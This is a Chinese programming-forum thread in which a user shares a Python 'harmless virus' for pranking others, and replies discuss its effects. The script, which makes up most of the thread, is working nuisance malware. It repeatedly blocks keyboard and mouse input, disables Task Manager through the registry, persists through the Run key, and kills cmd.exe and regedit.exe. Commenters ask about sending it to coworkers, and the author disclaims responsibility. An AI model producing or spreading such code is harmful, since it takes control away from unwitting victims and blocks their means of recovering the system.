wyhpylc 发表于 2023-3-4 20:44:16

Python无害病毒!

整人必备!!!!!
并且!!!这个东西会让你知道你以前有过朋友{:10_256:}

import os
import winreg
import psutil
from ctypes import *
import threading as th
import time

def no_key():
    while True:
      user32 = windll.LoadLibrary("C:\\Windows\\System32\\user32.dll")
      time.sleep(5)
      user32.BlockInput(True)
      time.sleep(10)
      user32.BlockInput(False)
      time.sleep(10)

if windll.shell32.IsUserAnAdmin() != 1:
    print("请以管理员权限运行我")
    input()
else:
    t1 = th.Thread(target=no_key,name="error")
    t1.start()

    access_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies")

    Key_list_sys = []
    n = 0
    while True:
      try:
            n += 1
            x = winreg.EnumKey(access_key, n)
            Key_list_sys.append(x)
      except:
            break

    winreg.CloseKey(access_key)

    if "System" not in Key_list_sys: #还没写已经有System文件夹的禁用方案
      reg = winreg.CreateKeyEx(winreg.HKEY_CURRENT_USER, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", reserved=0, access=winreg.KEY_ALL_ACCESS)
      winreg.SetValueEx(reg, "DisableTaskMgr", 0, winreg.REG_SZ, "1")
      winreg.CloseKey(reg)

    now_path = os.getcwd()
    run_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", reserved=0, access=winreg.KEY_ALL_ACCESS)
    try:
      winreg.LoadKey(winreg.HKEY_CURRENT_USER, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "error_run_regedit")
    except:
      winreg.SetValueEx(run_key, "error_run_regedit", 0,winreg.REG_SZ, f"{now_path}\\error.py")


    app_list = []

    while True:
      try:
            pids = psutil.pids()
            for pid in pids:
                if pid not in app_list:
                  app_list.append(pid)
                  p = psutil.Process(pid)
                  if p.name() == "cmd.exe":
                        os.system(f"taskkill /F /PID {pid}")
                  if p.name() == "regedit.exe":
                        os.system(f"taskkill /F /PID {pid}")
      except:
            pass

wyhpylc 发表于 2023-3-5 11:22:35

因为一开始没打算搞大了,就直接线性执行吧,没搞函数

wyhpylc 发表于 2023-3-5 15:02:40

up!

py木木 发表于 2023-3-23 20:17:24

有什么效果

wyhpylc 发表于 2023-3-23 20:36:27

py木木 发表于 2023-3-23 20:17
有什么效果

禁用任务管理器,鼠标每隔10秒就不能移动,整人玩玩的,就没整得花里胡哨

py木木 发表于 2023-3-23 21:06:34

wyhpylc 发表于 2023-3-23 20:36
禁用任务管理器,鼠标每隔10秒就不能移动,整人玩玩的,就没整得花里胡哨

能用微信发给同事吗

Eschborn 发表于 2023-3-23 21:10:53

真的无害吗

wyhpylc 发表于 2023-3-24 20:04:16

py木木 发表于 2023-3-23 21:06
能用微信发给同事吗

不建议发这个,建议这个,出现任何状况和我没有关系{:10_256:}

wyhpylc 发表于 2023-3-24 20:04:56

Eschborn 发表于 2023-3-23 21:10
真的无害吗

你可以试试,我这个帖子忘了删调试了,所以鼠标还可以动,
页: [1]
查看完整版本: Python无害病毒!